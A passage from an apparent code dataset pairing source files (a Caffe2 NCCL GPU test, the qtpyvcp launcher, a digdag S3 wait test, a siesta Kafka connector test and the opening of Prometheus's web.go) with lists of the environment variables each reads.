outputs = [str("{}x_{}".format(prefix, i)) for i in range(n)]
op = core.CreateOperator("NCCLAllreduce", inputs, outputs)
input_device_options = {n: gpu_device(i) for i, n in enumerate(inputs)}
def allreduce(*args):
assert len(args) == n
output = np.sum(args, axis=0)
return [output for _ in range(n)]
outputs = self.assertReferenceChecks(
hu.gpu_do, op, [xs[i] for i, _ in enumerate(inputs)],
allreduce, input_device_options)
for output in outputs:
np.testing.assert_array_equal(outputs[0], output)
self.assertEqual(outputs[0].tobytes(), output.tobytes())
@given(n=st.integers(min_value=2, max_value=workspace.NumGpuDevices()),
m=st.integers(min_value=1, max_value=1000),
root=st.integers(min_value=0,
max_value=workspace.NumGpuDevices() - 1))
def test_nccl_broadcast(self, n, m, root):
assume(root < n)
xs = [np.random.randn(m).astype(np.float32) for i in range(n)]
inputs = [str("x_{}".format(i)) for i in range(n)]
op = core.CreateOperator("NCCLBroadcast", inputs, inputs, root=root)
input_device_options = {n: gpu_device(i) for i, n in enumerate(inputs)}
def broadcast(*args):
assert len(args) == n
return [args[root] for _ in range(n)]
self.assertReferenceChecks(
hu.gpu_do, op, [xs[i] for i, _ in enumerate(inputs)],
broadcast, input_device_options)
@given(n=st.integers(min_value=2, max_value=workspace.NumGpuDevices()),
m=st.integers(min_value=1, max_value=1000),
# NCCL Reduce seems to deadlock for non-zero roots.
root=st.integers(min_value=0, max_value=0),
in_place=st.booleans())
def test_nccl_reduce(self, n, m, root, in_place):
assume(in_place is False or root == 0)
xs = [np.random.randn(m).astype(np.float32) for i in range(n)]
inputs = [str("x_{}".format(i)) for i in range(n)]
op = core.CreateOperator(
"NCCLReduce", inputs,
inputs[root] if in_place else b"o", root=root)
input_device_options = {n: gpu_device(i) for i, n in enumerate(inputs)}
def reduce(*args):
assert len(args) == n
return [np.sum(args, axis=0)]
self.assertReferenceChecks(
hu.gpu_do, op, [xs[i] for i, _ in enumerate(inputs)],
reduce, input_device_options)
@given(n=st.integers(min_value=2, max_value=workspace.NumGpuDevices()),
m=st.integers(min_value=1, max_value=1000))
def test_nccl_allgather(self, n, m):
xs = [np.random.randn(m).astype(np.float32) for i in range(n)]
inputs = [str("x_{}".format(i)) for i in range(n)]
outputs = [str("o_{}".format(i)) for i in range(n)]
op = core.CreateOperator("NCCLAllGather", inputs, outputs)
input_device_options = {n: gpu_device(i) for i, n in enumerate(inputs)}
def allgather(*args):
assert len(args) == n
return [np.stack(args, axis=0) for _ in range(n)]
outputs = self.assertReferenceChecks(
hu.gpu_do, op, [xs[i] for i, _ in enumerate(inputs)],
allgather, input_device_options)
for output in outputs:
np.testing.assert_array_equal(outputs[0], output)
self.assertEqual(outputs[0].tobytes(), output.tobytes())
@given(n=st.integers(min_value=2, max_value=workspace.NumGpuDevices()),
m=st.integers(min_value=1, max_value=1000))
def test_nccl_reduce_scatter(self, n, m):
xs = [np.random.randn(n, m).astype(np.float32) for i in range(n)]
inputs = [str("x_{}".format(i)) for i in range(n)]
outputs = [str("o_{}".format(i)) for i in range(n)]
op = core.CreateOperator("NCCLReduceScatter", inputs, outputs)
input_device_options = {n: gpu_device(i) for i, n in enumerate(inputs)}
def reduce_scatter(*args):
assert len(args) == n
reduced = sum(args)
assert len(reduced.shape) > 1
ref = [reduced[i, :] for i in range(n)]
return ref
self.assertReferenceChecks(
hu.gpu_do, op, [xs[i] for i, _ in enumerate(inputs)],
reduce_scatter, input_device_options)
@given(n=st.integers(min_value=2, max_value=workspace.NumGpuDevices()),
m=st.integers(min_value=100000, max_value=100000),
iters=st.integers(min_value=1, max_value=100),
net_type=st.sampled_from(["dag", "async_dag", "simple"]))
def _test_nccl_sync(self, n, m, iters, net_type):
inputs = [str("x_{}".format(i)) for i in range(n)]
extra_inputs = [str("xe_{}".format(i)) for i in range(n)]
net = core.Net("asdf")
net.Proto().type = net_type
net.Proto().num_workers = n
for i in range(n):
net.ConstantFill([], inputs[i], shape=[m], value=0.0,
device_option=gpu_device(i))
net.ConstantFill([], extra_inputs[i], shape=[m], value=1.0,
device_option=gpu_device(i))
for _ in range(iters):
net.Sum([inputs[i], extra_inputs[i]], [inputs[i]],
device_option=gpu_device(i))
net.NCCLReduce(inputs, [inputs[0]], device_option=gpu_device(0))
self.ws.run(net)
np.testing.assert_array_equal(
self.ws.blobs[inputs[0]].fetch(),
np.full(shape=(m,), fill_value=iters * n, dtype=np.float32))
@unittest.skipIf(not os.environ.get("CAFFE2_BENCHMARK"), "Benchmark")
def test_timings(self):
for n in range(2, workspace.NumGpuDevices()):
for in_place in [False, True]:
xs = [np.random.randn(1e7).astype(np.float32)
for i in range(n)]
inputs = [str("x_{}".format(i)) for i in range(n)]
prefix = "" if in_place else "o"
outputs = [str("{}x_{}".format(prefix, i)) for i in range(n)]
net = core.Net("test")
net.NCCLAllreduce(inputs, outputs)
net.RunAllOnGPU()
for i in range(n):
self.ws.create_blob(inputs[i]).feed(xs[i], gpu_device(i))
self.ws.run(net)
net_time = benchmark(self.ws, net)
vanilla = core.Net("vanilla")
muji.Allreduce(vanilla, inputs)
vanilla_time = benchmark(self.ws, vanilla)
print("Speedup for NCCL: {:.2f}".format(
vanilla_time / net_time))
|
[] |
[] |
[
"CAFFE2_BENCHMARK"
] |
[]
|
["CAFFE2_BENCHMARK"]
|
python
| 1 | 0 | |
qtpyvcp/app/launcher.py
|
import os
import sys
import time
import importlib
from pkg_resources import iter_entry_points
from qtpy.QtCore import Qt
from qtpy.QtWidgets import QApplication
import qtpyvcp
from qtpyvcp import hal
from qtpyvcp.utilities.logger import getLogger
from qtpyvcp.plugins import registerPluginFromClass, postGuiInitialisePlugins
from qtpyvcp.widgets.dialogs.error_dialog import ErrorDialog, IGNORE_LIST
from qtpyvcp.utilities.info import Info
LOG = getLogger(__name__)
INFO = Info()
# Catch unhandled exceptions and display in dialog
def excepthook(exc_type, exc_msg, exc_tb):
try:
filename = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
lineno = exc_tb.tb_lineno
except AttributeError:
# AttributeError: 'NoneType' object has no attribute 'tb_frame'
filename = 'unknown file'
lineno = -1
if len(IGNORE_LIST) > 0 and (str(exc_type), str(exc_msg), lineno) in IGNORE_LIST:
LOG.debug('Ignoring unhandled exception in %s line %i', filename, lineno,
exc_info=(exc_type, exc_msg, exc_tb))
return
LOG.critical('Unhandled exception in %s line %i', filename, lineno,
exc_info=(exc_type, exc_msg, exc_tb))
# if an exception occurs early on a qApp may not have been created yet,
# so create one so the dialog will be able to run without errors.
if QApplication.instance() is None:
app = QApplication([])
error_dialog = ErrorDialog(exc_info=(exc_type, exc_msg, exc_tb))
error_dialog.exec_()
sys.excepthook = excepthook
def log_time(task, times=[time.time(), time.time()]):
now = time.time()
LOG.debug("yellow<Time:> {:.3f} (green<{:+.3f}>) - {}"
.format(now - times[0], now - times[1], task))
times[1] = now
log_time("in script")
def launch_application(opts, config):
qtpyvcp.OPTIONS.update(opts)
qtpyvcp.CONFIG.update(config)
hal_comp = hal.component('qtpyvcp')
LOG.debug('Loading data plugings')
loadPlugins(config['data_plugins'])
log_time('done loading data plugins')
LOG.debug('Initializing app')
app = _initialize_object_from_dict(config['application'])
log_time('done initializing app')
LOG.debug('Loading dialogs')
loadDialogs(config['dialogs'])
log_time('done loading dialogs')
LOG.debug('Loading windows')
loadWindows(config['windows'])
log_time('done loading windows')
LOG.debug('Initializing widgets')
app.initialiseWidgets()
log_time('done initializing widgets')
hal_comp.ready()
# load any post GUI hal file
postgui_halfile = INFO.getPostguiHalfile()
if postgui_halfile != "":
if not os.path.exists(postgui_halfile):
raise IOError('The specified POSTGUI_HALFILE does not exist: %s' %
postgui_halfile)
ini_path = INFO.INI_FILE
LOG.info('Loading POSTGUI_HALFILE: %s', postgui_halfile)
res = os.spawnvp(os.P_WAIT, "halcmd", ["halcmd", "-i", ini_path, "-f", postgui_halfile])
if res:
raise SystemExit("Failed to load POSTGUI_HALFILE with error: %s" % res)
# suppress QtQuick warnings
app.setAttribute(Qt.AA_DontCreateNativeWidgetSiblings)
sys.exit(app.exec_())
def load_vcp(opts):
vcp = opts.vcp
if vcp is None:
return
vcp_path = os.path.realpath(os.path.join(os.getenv('OLDPWD', '~'), vcp))
if os.path.isfile(vcp_path):
LOG.debug("Attempting to load VCP from file: {}".format(vcp_path))
directory, filename = os.path.split(vcp_path)
name, ext = os.path.splitext(filename)
if ext.lower() in ['.yaml', '.yml']:
_load_vcp_from_yaml_file(vcp_path, opts)
return
elif ext.lower() == '.ui':
_load_vcp_from_ui_file(vcp_path, opts)
return
if _load_vcp_from_entry_point(vcp, opts):
return
LOG.error("Could not load {}, make sure that the name or "
"file path is correct.".format(vcp_path))
def _load_vcp_from_yaml_file(yaml_file, opts):
LOG.info("Loading VCP from YAML file: yellow<{}>".format(yaml_file))
from qtpyvcp.utilities.config_loader import load_config_files
cfg_files = [opts.config_file or '']
cfg_files.extend(os.getenv('VCP_CONFIG_FILES', '').split(':'))
cfg_files.append(yaml_file)
cfg_files.append(qtpyvcp.DEFAULT_CONFIG_FILE)
config = load_config_files(*cfg_files)
# add the YAML file dir to path so can import relative modules
sys.path.insert(0, os.path.dirname(os.path.dirname(yaml_file)))
launch_application(opts, config)
def _load_vcp_from_ui_file(ui_file, opts):
LOG.info("Loading VCP from UI file: yellow<{}>".format(ui_file))
from qtpyvcp.utilities.config_loader import load_config_files
cfg_files = [opts.config_file or '']
cfg_files.extend(os.getenv('VCP_CONFIG_FILES', '').split(':'))
cfg_files.append(qtpyvcp.DEFAULT_CONFIG_FILE)
config = load_config_files(*cfg_files)
kwargs = config['windows']['mainwindow'].get('kwargs', {})
kwargs.update({'ui_file': ui_file})
config['windows']['mainwindow']['kwargs'] = kwargs
launch_application(opts, config)
def _load_vcp_from_entry_point(vcp_name, opts):
entry_points = {}
for entry_point in iter_entry_points(group='qtpyvcp.example_vcp'):
entry_points[entry_point.name] = entry_point
for entry_point in iter_entry_points(group='qtpyvcp.test_vcp'):
entry_points[entry_point.name] = entry_point
for entry_point in iter_entry_points(group='qtpyvcp.vcp'):
entry_points[entry_point.name] = entry_point
try:
vcp = entry_points[vcp_name.lower()].load()
except KeyError:
LOG.exception("Failed to find entry point: {}".format(vcp_name))
except Exception as e:
LOG.debug(e)
LOG.exception("Failed to load entry point: {}".format(vcp_name))
else:
vcp.main(opts)
LOG.info("Loading VCP from entry point: {}".format(vcp_name))
vcp.main(opts)
return True
def _get_object_by_referance(object_ref):
modname, sep, attrname = object_ref.partition(':')
try:
return getattr(importlib.import_module(modname), attrname)
except Exception:
LOG.critical("Failed to get object by reference: {}".format(object_ref))
raise
def _initialize_object_from_dict(object_dict, parent=None):
"""Initialize a python object from dict."""
provider = object_dict['provider']
args = object_dict.get('args') or []
kwargs = object_dict.get('kwargs') or {}
obj = _get_object_by_referance(provider)
if parent is not None:
kwargs.update({'parent': parent})
return obj(*args, **kwargs)
def loadPlugins(plugins):
for plugin_id, plugin_dict in list(plugins.items()):
try:
cls = plugin_dict['provider']
except KeyError:
raise ValueError("No provider class specified for %s plugin" % plugin_id)
args = plugin_dict.get('args', [])
kwargs = plugin_dict.get('kwargs', {})
registerPluginFromClass(plugin_id=plugin_id, plugin_cls=cls, args=args, kwargs=kwargs)
def loadWindows(windows):
for window_id, window_dict in list(windows.items()):
window = _initialize_object_from_dict(window_dict)
qtpyvcp.WINDOWS[window_id] = window
if window_id == 'mainwindow':
postGuiInitialisePlugins(window)
# show the window by default
if window_dict.get('show', True):
window.show()
def loadDialogs(dialogs):
for dialogs_id, dialogs_dict in list(dialogs.items()):
inst = _initialize_object_from_dict(dialogs_dict)
qtpyvcp.DIALOGS[dialogs_id] = inst
|
[] |
[] |
[
"OLDPWD",
"VCP_CONFIG_FILES"
] |
[]
|
["OLDPWD", "VCP_CONFIG_FILES"]
|
python
| 2 | 0 | |
digdag-tests/src/test/java/acceptance/S3WaitIT.java
|
package acceptance;
import com.amazonaws.auth.AWSCredentials;
import com.amazonaws.auth.AWSStaticCredentialsProvider;
import com.amazonaws.auth.BasicAWSCredentials;
import com.amazonaws.client.builder.AwsClientBuilder;
import com.amazonaws.services.s3.AmazonS3;
import com.amazonaws.services.s3.AmazonS3ClientBuilder;
import com.amazonaws.services.s3.model.ObjectMetadata;
import com.amazonaws.util.StringInputStream;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.google.common.collect.ImmutableMap;
import io.digdag.client.DigdagClient;
import io.digdag.client.api.Id;
import io.digdag.client.api.RestSessionAttempt;
import org.apache.commons.lang3.RandomUtils;
import org.junit.After;
import org.junit.Before;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.TemporaryFolder;
import org.littleshoot.proxy.HttpProxyServer;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import utils.TemporaryDigdagServer;
import utils.TestUtils;
import java.nio.file.Files;
import java.nio.file.Path;
import java.time.Duration;
import java.util.Base64;
import java.util.UUID;
import static java.nio.charset.StandardCharsets.UTF_8;
import static org.hamcrest.Matchers.is;
import static org.hamcrest.Matchers.isEmptyOrNullString;
import static org.hamcrest.Matchers.not;
import static org.hamcrest.MatcherAssert.assertThat;
import static utils.TestUtils.addWorkflow;
import static utils.TestUtils.attemptSuccess;
import static utils.TestUtils.createProject;
import static utils.TestUtils.expect;
import static utils.TestUtils.startWorkflow;
public class S3WaitIT
{
private static Logger logger = LoggerFactory.getLogger(S3WaitIT.class);
private static final String TEST_S3_ENDPOINT = System.getenv("TEST_S3_ENDPOINT");
private static final String TEST_S3_ACCESS_KEY_ID = System.getenv().getOrDefault("TEST_S3_ACCESS_KEY_ID", "test");
private static final String TEST_S3_SECRET_ACCESS_KEY = System.getenv().getOrDefault("TEST_S3_SECRET_ACCESS_KEY", "test");
private static final ObjectMapper MAPPER = DigdagClient.objectMapper();
public TemporaryDigdagServer server;
@Rule
public TemporaryFolder folder = new TemporaryFolder();
private Path projectDir;
private DigdagClient client;
private HttpProxyServer proxyServer;
private String bucket;
private AmazonS3 s3;
@Before
public void setUp()
throws Exception
{
assertThat(TEST_S3_ENDPOINT, not(isEmptyOrNullString()));
proxyServer = TestUtils.startRequestFailingProxy(10);
server = TemporaryDigdagServer.builder()
.environment(ImmutableMap.of(
"http_proxy", "http://" + proxyServer.getListenAddress().getHostString() + ":" + proxyServer.getListenAddress().getPort())
)
.configuration(
"digdag.secret-encryption-key = " + Base64.getEncoder().encodeToString(RandomUtils.nextBytes(16)))
.build();
server.start();
projectDir = folder.getRoot().toPath().resolve("foobar");
client = DigdagClient.builder()
.host(server.host())
.port(server.port())
.build();
bucket = UUID.randomUUID().toString();
AWSCredentials credentials = new BasicAWSCredentials(TEST_S3_ACCESS_KEY_ID, TEST_S3_SECRET_ACCESS_KEY);
s3 = AmazonS3ClientBuilder.standard()
.withCredentials(new AWSStaticCredentialsProvider(credentials))
.withEndpointConfiguration(new AwsClientBuilder.EndpointConfiguration(TEST_S3_ENDPOINT, null))
.build();
s3.createBucket(bucket);
}
@After
public void tearDownProxy()
throws Exception
{
if (proxyServer != null) {
proxyServer.stop();
proxyServer = null;
}
}
@After
public void tearDownServer()
throws Exception
{
if (server != null) {
server.close();
server = null;
}
}
@Test
public void testRun()
throws Exception
{
String key = UUID.randomUUID().toString();
Path outfile = folder.newFolder().toPath().resolve("out");
createProject(projectDir);
addWorkflow(projectDir, "acceptance/s3/s3_wait.dig");
Id projectId = TestUtils.pushProject(server.endpoint(), projectDir);
// Configure AWS credentials
client.setProjectSecret(projectId, "aws.s3.access_key_id", TEST_S3_ACCESS_KEY_ID);
client.setProjectSecret(projectId, "aws.s3.secret_access_key", TEST_S3_SECRET_ACCESS_KEY);
client.setProjectSecret(projectId, "aws.s3.endpoint", TEST_S3_ENDPOINT);
// Start workflow
String projectName = projectDir.getFileName().toString();
Id attemptId = startWorkflow(server.endpoint(), projectName, "s3_wait", ImmutableMap.of(
"path", bucket + "/" + key,
"outfile", outfile.toString()
));
// Wait for s3 polling to show up in logs
expect(Duration.ofSeconds(30), () -> {
String attemptLogs = TestUtils.getAttemptLogs(client, attemptId);
return attemptLogs.contains("s3_wait>: " + bucket + "/" + key);
});
// Verify that the dependent task has not been executed
assertThat(Files.exists(outfile), is(false));
// Verify that the attempt is not yet done
RestSessionAttempt attempt = client.getSessionAttempt(attemptId);
assertThat(attempt.getDone(), is(false));
// Create the file that the workflow is waiting for
String content = "hello world";
s3.putObject(bucket, key, new StringInputStream(content), new ObjectMetadata());
// Expect the attempt to finish and the dependent task to be executed
expect(Duration.ofMinutes(2), attemptSuccess(server.endpoint(), attemptId));
assertThat(Files.exists(outfile), is(true));
JsonNode objectMetadata = MAPPER.readTree(Files.readAllBytes(outfile));
int contentLength = objectMetadata.get("metadata").get("Content-Length").asInt();
assertThat(contentLength, is(content.length()));
}
@Test
public void testTimeout()
throws Exception
{
String key = UUID.randomUUID().toString();
Path outfile = folder.newFolder().toPath().resolve("out");
createProject(projectDir);
addWorkflow(projectDir, "acceptance/s3/s3_wait_timeout.dig");
Id projectId = TestUtils.pushProject(server.endpoint(), projectDir);
// Configure AWS credentials
client.setProjectSecret(projectId, "aws.s3.access_key_id", TEST_S3_ACCESS_KEY_ID);
client.setProjectSecret(projectId, "aws.s3.secret_access_key", TEST_S3_SECRET_ACCESS_KEY);
client.setProjectSecret(projectId, "aws.s3.endpoint", TEST_S3_ENDPOINT);
// Start workflow
String projectName = projectDir.getFileName().toString();
Id attemptId = startWorkflow(server.endpoint(), projectName, "s3_wait_timeout", ImmutableMap.of(
"path", bucket + "/" + key,
"outfile", outfile.toString()
));
// Wait for s3 polling finish because of timeout
expect(Duration.ofSeconds(60), () -> {
RestSessionAttempt attempt = client.getSessionAttempt(attemptId);
return attempt.getDone();
});
// Verify that the attempt is done and failed
RestSessionAttempt attempt = client.getSessionAttempt(attemptId);
assertThat(attempt.getDone(), is(true));
assertThat(attempt.getSuccess(), is(false));
assertThat(attempt.getFinishedAt().isPresent(), is(true));
}
@Test
public void testContinueOnTimeout()
throws Exception
{
String key = UUID.randomUUID().toString();
Path outfile = folder.newFolder().toPath().resolve("out");
createProject(projectDir);
addWorkflow(projectDir, "acceptance/s3/s3_wait_continue_on_timeout.dig");
Id projectId = TestUtils.pushProject(server.endpoint(), projectDir);
// Configure AWS credentials
client.setProjectSecret(projectId, "aws.s3.access_key_id", TEST_S3_ACCESS_KEY_ID);
client.setProjectSecret(projectId, "aws.s3.secret_access_key", TEST_S3_SECRET_ACCESS_KEY);
client.setProjectSecret(projectId, "aws.s3.endpoint", TEST_S3_ENDPOINT);
// Start workflow
String projectName = projectDir.getFileName().toString();
Id attemptId = startWorkflow(server.endpoint(), projectName, "s3_wait_continue_on_timeout", ImmutableMap.of(
"path", bucket + "/" + key,
"outfile", outfile.toString()
));
// Wait for s3 polling finish because of timeout
expect(Duration.ofSeconds(60), () -> {
RestSessionAttempt attempt = client.getSessionAttempt(attemptId);
return attempt.getDone();
});
// Verify that the attempt is done and failed
RestSessionAttempt attempt = client.getSessionAttempt(attemptId);
assertThat(attempt.getDone(), is(true));
assertThat(attempt.getSuccess(), is(true));
assertThat(attempt.getFinishedAt().isPresent(), is(true));
//Verify outfile
String outfileText = new String(Files.readAllBytes(outfile), UTF_8);
assertThat(outfileText.contains("Finished task +wait"), is(true));
assertThat(outfileText.contains("Empty is good"), is(true));
}
}
|
[
"\"TEST_S3_ENDPOINT\""
] |
[] |
[
"TEST_S3_ENDPOINT"
] |
[]
|
["TEST_S3_ENDPOINT"]
|
java
| 1 | 0 | |
Godeps/_workspace/src/github.com/elodina/siesta/connector_test.go
|
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package siesta
import (
"fmt"
"math/rand"
"net"
"os"
"testing"
"time"
)
var ci = os.Getenv("TRAVIS_CI") != ""
var brokerUp = true
var brokerAddr = "localhost:9092"
func init() {
conn, err := net.Dial("tcp", brokerAddr)
if err == nil {
brokerUp = true
conn.Close()
}
}
func TestDefaultConnectorFunctional(t *testing.T) {
if !brokerUp && !ci {
t.Skip("Broker is not running. Please spin up the broker at localhost:9092 for this test to work.")
}
numMessages := 1000
topicName := fmt.Sprintf("siesta-%d", time.Now().Unix())
connector := testConnector(t)
testTopicMetadata(t, topicName, connector)
testOffsetStorage(t, topicName, connector)
testProduce(t, topicName, numMessages, connector)
testConsume(t, topicName, numMessages, connector)
closeWithin(t, time.Second, connector)
//check whether closing multiple times hangs
closeWithin(t, time.Second, connector)
anotherConnector := testConnector(t)
//should also work fine - must get topic metadata before consuming
testConsume(t, topicName, numMessages, anotherConnector)
closeWithin(t, time.Second, anotherConnector)
}
func testTopicMetadata(t *testing.T, topicName string, connector *DefaultConnector) {
metadata, err := connector.GetTopicMetadata([]string{topicName})
assertFatal(t, err, nil)
assertNot(t, len(metadata.Brokers), 0)
assertNot(t, len(metadata.TopicsMetadata), 0)
if len(metadata.Brokers) > 1 {
t.Skip("Cluster should consist only of one broker for this test to run.")
}
broker := metadata.Brokers[0]
assert(t, broker.ID, int32(0))
if ci {
// this can be asserted on Travis only as we are guaranteed to advertise the broker as localhost
assert(t, broker.Host, "localhost")
}
assert(t, broker.Port, int32(9092))
topicMetadata := findTopicMetadata(t, metadata.TopicsMetadata, topicName)
assert(t, topicMetadata.Error, ErrNoError)
assert(t, topicMetadata.Topic, topicName)
assertFatal(t, len(topicMetadata.PartitionsMetadata), 1)
partitionMetadata := topicMetadata.PartitionsMetadata[0]
assert(t, partitionMetadata.Error, ErrNoError)
assert(t, partitionMetadata.ISR, []int32{0})
assert(t, partitionMetadata.Leader, int32(0))
assert(t, partitionMetadata.PartitionID, int32(0))
assert(t, partitionMetadata.Replicas, []int32{0})
}
func testOffsetStorage(t *testing.T, topicName string, connector *DefaultConnector) {
group := fmt.Sprintf("test-%d", time.Now().Unix())
targetOffset := rand.Int63()
offset, err := connector.GetOffset(group, topicName, 0)
assertFatal(t, err, ErrUnknownTopicOrPartition)
assert(t, offset, int64(-1))
err = connector.CommitOffset(group, topicName, 0, targetOffset)
assertFatal(t, err, nil)
offset, err = connector.GetOffset(group, topicName, 0)
assertFatal(t, err, nil)
assert(t, offset, targetOffset)
}
func testProduce(t *testing.T, topicName string, numMessages int, connector *DefaultConnector) {
produceRequest := new(ProduceRequest)
produceRequest.AckTimeoutMs = 1000
produceRequest.RequiredAcks = 1
for i := 0; i < numMessages; i++ {
produceRequest.AddMessage(topicName, 0, &Message{
Key: []byte(fmt.Sprintf("%d", numMessages-i)),
Value: []byte(fmt.Sprintf("%d", i)),
})
}
leader, err := connector.tryGetLeader(topicName, 0, 3)
assert(t, err, nil)
assertNot(t, leader, (*brokerLink)(nil))
bytes, err := connector.syncSendAndReceive(leader, produceRequest)
assertFatal(t, err, nil)
produceResponse := new(ProduceResponse)
decodingErr := connector.decode(bytes, produceResponse)
assertFatal(t, decodingErr, (*DecodingError)(nil))
topicBlock, exists := produceResponse.Status[topicName]
assertFatal(t, exists, true)
partitionBlock, exists := topicBlock[int32(0)]
assertFatal(t, exists, true)
assert(t, partitionBlock.Error, ErrNoError)
assert(t, partitionBlock.Offset, int64(0))
}
func testConsume(t *testing.T, topicName string, numMessages int, connector *DefaultConnector) {
response, err := connector.Fetch(topicName, 0, 0)
assertFatal(t, response.Error(topicName, 0), ErrNoError)
assertFatal(t, err, nil)
messages, err := response.GetMessages()
assertFatal(t, err, nil)
assertFatal(t, len(messages), numMessages)
for i := 0; i < numMessages; i++ {
message := messages[i]
assert(t, message.Topic, topicName)
assert(t, message.Partition, int32(0))
assert(t, message.Offset, int64(i))
assert(t, message.Key, []byte(fmt.Sprintf("%d", numMessages-i)))
assert(t, message.Value, []byte(fmt.Sprintf("%d", i)))
}
}
func findTopicMetadata(t *testing.T, metadata []*TopicMetadata, topic string) *TopicMetadata {
for _, topicMetadata := range metadata {
if topicMetadata.Topic == topic {
return topicMetadata
}
}
t.Fatalf("TopicMetadata for topic %s not found", topic)
return nil
}
|
[
"\"TRAVIS_CI\""
] |
[] |
[
"TRAVIS_CI"
] |
[]
|
["TRAVIS_CI"]
|
go
| 1 | 0 | |
web/web.go
|
// Copyright 2013 The Prometheus Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package web
import (
"bytes"
"context"
"encoding/json"
"fmt"
"io"
"io/ioutil"
stdlog "log"
"math"
"net"
"net/http"
"net/http/pprof"
"net/url"
"os"
"path"
"path/filepath"
"regexp"
"runtime"
"sort"
"strings"
"sync"
"sync/atomic"
template_text "text/template"
"time"
"github.com/alecthomas/units"
"github.com/go-kit/kit/log"
"github.com/go-kit/kit/log/level"
conntrack "github.com/mwitkow/go-conntrack"
"github.com/opentracing-contrib/go-stdlib/nethttp"
opentracing "github.com/opentracing/opentracing-go"
"github.com/pkg/errors"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promhttp"
io_prometheus_client "github.com/prometheus/client_model/go"
"github.com/prometheus/common/model"
"github.com/prometheus/common/route"
"github.com/prometheus/common/server"
"github.com/prometheus/prometheus/tsdb"
"github.com/prometheus/prometheus/tsdb/index"
"github.com/soheilhy/cmux"
"golang.org/x/net/netutil"
"google.golang.org/grpc"
"github.com/prometheus/prometheus/config"
"github.com/prometheus/prometheus/notifier"
"github.com/prometheus/prometheus/promql"
"github.com/prometheus/prometheus/rules"
"github.com/prometheus/prometheus/scrape"
"github.com/prometheus/prometheus/storage"
"github.com/prometheus/prometheus/template"
"github.com/prometheus/prometheus/util/httputil"
api_v1 "github.com/prometheus/prometheus/web/api/v1"
api_v2 "github.com/prometheus/prometheus/web/api/v2"
"github.com/prometheus/prometheus/web/ui"
)
// Paths that are handled by the React / Reach router that should all be served the main React app's index.html.
var reactRouterPaths = []string{
"/",
"/alerts",
"/config",
"/flags",
"/graph",
"/rules",
"/service-discovery",
"/status",
"/targets",
"/tsdb-status",
"/version",
}
// withStackTrace logs the stack trace in case the request panics. The function
// will re-raise the error which will then be handled by the net/http package.
// It is needed because the go-kit log package doesn't manage properly the
// panics from net/http (see https://github.com/go-kit/kit/issues/233).
func withStackTracer(h http.Handler, l log.Logger) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
defer func() {
if err := recover(); err != nil {
const size = 64 << 10
buf := make([]byte, size)
buf = buf[:runtime.Stack(buf, false)]
level.Error(l).Log("msg", "panic while serving request", "client", r.RemoteAddr, "url", r.URL, "err", err, "stack", buf)
panic(err)
}
}()
h.ServeHTTP(w, r)
})
}
type metrics struct {
requestCounter *prometheus.CounterVec
requestDuration *prometheus.HistogramVec
responseSize *prometheus.HistogramVec
}
func newMetrics(r prometheus.Registerer) *metrics {
m := &metrics{
requestCounter: prometheus.NewCounterVec(
prometheus.CounterOpts{
Name: "prometheus_http_requests_total",
Help: "Counter of HTTP requests.",
},
[]string{"handler", "code"},
),
requestDuration: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Name: "prometheus_http_request_duration_seconds",
Help: "Histogram of latencies for HTTP requests.",
Buckets: []float64{.1, .2, .4, 1, 3, 8, 20, 60, 120},
},
[]string{"handler"},
),
responseSize: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Name: "prometheus_http_response_size_bytes",
Help: "Histogram of response size for HTTP requests.",
Buckets: prometheus.ExponentialBuckets(100, 10, 8),
},
[]string{"handler"},
),
}
if r != nil {
r.MustRegister(m.requestCounter, m.requestDuration, m.responseSize)
registerFederationMetrics(r)
}
return m
}
func (m *metrics) instrumentHandlerWithPrefix(prefix string) func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return m.instrumentHandler(prefix+handlerName, handler)
}
}
func (m *metrics) instrumentHandler(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return promhttp.InstrumentHandlerCounter(
m.requestCounter.MustCurryWith(prometheus.Labels{"handler": handlerName}),
promhttp.InstrumentHandlerDuration(
m.requestDuration.MustCurryWith(prometheus.Labels{"handler": handlerName}),
promhttp.InstrumentHandlerResponseSize(
m.responseSize.MustCurryWith(prometheus.Labels{"handler": handlerName}),
handler,
),
),
)
}
// PrometheusVersion contains build information about Prometheus.
type PrometheusVersion = api_v1.PrometheusVersion
type LocalStorage interface {
storage.Storage
api_v1.TSDBAdminStats
}
// Handler serves various HTTP endpoints of the Prometheus server
type Handler struct {
logger log.Logger
gatherer prometheus.Gatherer
metrics *metrics
scrapeManager *scrape.Manager
ruleManager *rules.Manager
queryEngine *promql.Engine
lookbackDelta time.Duration
context context.Context
storage storage.Storage
localStorage LocalStorage
notifier *notifier.Manager
apiV1 *api_v1.API
router *route.Router
quitCh chan struct{}
reloadCh chan chan error
options *Options
config *config.Config
versionInfo *PrometheusVersion
birth time.Time
cwd string
flagsMap map[string]string
mtx sync.RWMutex
now func() model.Time
ready uint32 // ready is uint32 rather than boolean to be able to use atomic functions.
}
// ApplyConfig updates the config field of the Handler struct
